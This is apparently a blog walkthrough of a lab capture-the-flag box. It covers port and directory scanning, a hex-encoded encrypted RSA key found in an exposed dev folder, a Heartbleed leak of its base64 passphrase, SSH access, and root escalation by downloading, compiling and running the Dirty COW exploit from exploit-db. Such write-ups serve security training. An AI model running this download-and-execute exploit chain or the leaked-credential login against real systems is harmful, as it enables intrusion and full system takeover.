root@Kali:~# nmap -sC -sS -sV -A -T4 10.10.10.79
Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-24 08:08 CDT
Nmap scan report for 10.10.10.79
Host is up (0.056s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).

DIRB Results:

—- Scanning URL: https://10.10.10.79/ —-
+ https://10.10.10.79/cgi-bin/ (CODE:403|SIZE:288)
+ https://10.10.10.79/decode (CODE:200|SIZE:552)                              
==> DIRECTORY: https://10.10.10.79/dev/
+ https://10.10.10.79/encode (CODE:200|SIZE:554)
+ https://10.10.10.79/index (CODE:200|SIZE:38)
+ https://10.10.10.79/index.php (CODE:200|SIZE:38)
+ https://10.10.10.79/server-status (CODE:403|SIZE:293)                       
—- Entering directory: https://10.10.10.79/dev/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.           

In the dev directory, I found a text file and something called hype_key which looks like a hex encoded RSA key.  Decoded here http://www.convertstring.com/EncodeDecode/HexDecode

To find username, I attempted a msf module for apache_userdir_enum, but didn’t get anything back.  I assumed based on my lack of any usernames that were usual, and the name of the key, that the username this was associated with was ‘hype’.

—–BEGIN RSA PRIVATE KEY—–
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
—–END RSA PRIVATE KEY—–

I also discovered this version is vulnurable to the well-known heartbleed exploit!

https://sathisharthars.com/2014/06/10/exploit-heartbleed-openssl-vulnerability-using-kali-linux/

The msf heartbleed scan gives us $text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg== which looks like something base64 encoded.

Dirb told us there’s a decode page on this server.

Your input:

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

Your encoded input:

heartbleedbelievethehype

Saved the key on my local machine, then SSH into the box.

The key must be in a certain format (chmod 400 hype_key.txt) otherwise it won’t be accepted.

The login screen also tells us as soon as we login that this an out-of-date release, which may be useful since that’s a pretty old kernel.  A quick google for Linux 3.2.0-23-generic exploits gets me this: https://github.com/SecWiki/linux-kernel-exploits/tree/master/2013/CVE-2013-2094, Kernel Dirty COW local root exploit Demonstration

wget –no-check-certificate ‘https://www.exploit-db.com/download/40839‘ -0 ‘dirty.c’

gcc –pthread dirty.c -o dirty –lcrypt

./dirty

Enter new password: password

su firefart

Password is new password.

cd /root

cat root.txt

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s